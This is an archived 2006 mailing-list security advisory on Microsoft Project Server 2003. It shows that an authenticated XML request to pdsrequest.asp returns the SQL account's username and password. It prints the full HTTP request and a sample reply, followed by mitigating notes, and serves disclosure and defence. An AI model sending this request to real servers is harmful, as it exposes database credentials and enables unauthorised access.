Project Server 2003 - Credential Disclosure

From: "Brett Moore" <brett.moore@xxxxxxxxxxxxxxxxxxxxxxx>
Date: Fri, 15 Dec 2006 12:08:41 +1300

==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore@xxxxxxxxxxxxxxxxxxxxxxx
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName> <----
<Password>sekretpass</Password> <----
<UserNTAccount>SERVER\USER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a
login with a valid username and password.
* Since the thick client is 'client side' any sql can be
manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also
be able to be made through this method.

==============================================================
%
==============================================================

Prev by Date: [security bulletin] HPSBMA02173 SSRT061230 rev. 1 - HP Integrated Lights Out (iLO & iLO 2) Running SSH Key Based Authentication Remote Unauthorized Access
Next by Date: Re: The (in)security of Xorg and DRI
Previous by thread: [security bulletin] HPSBMA02173 SSRT061230 rev. 1 - HP Integrated Lights Out (iLO & iLO 2) Running SSH Key Based Authentication Remote Unauthorized Access
Next by thread: Flaw in OpenOffice.org 2.1: OpenOffice 2.1 is vulnerable to MS Word 0 day vulnerability!!!
Index(es):
- Date
- Thread

Relevant Pages

[Full-disclosure] Project Server 2003 - Credential Disclosure
... Microsoft Project server 2003 implements a thick client ... XML requests to talk to the server of HTTP. ... The cookie must be a valid cookie, ...
(Full-Disclosure)
[NT] Project Server 2003 Credential Disclosure
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Project server 2003 implements a thick client for some of the ... One of these requests returns the username and password of the ...
(Securiteam)
Re: .Net Framework 1.0 vs. 1.1 on client?
... Project server does that. ... > Proejct Server handles those requests on behalf of the client? ...
(microsoft.public.project)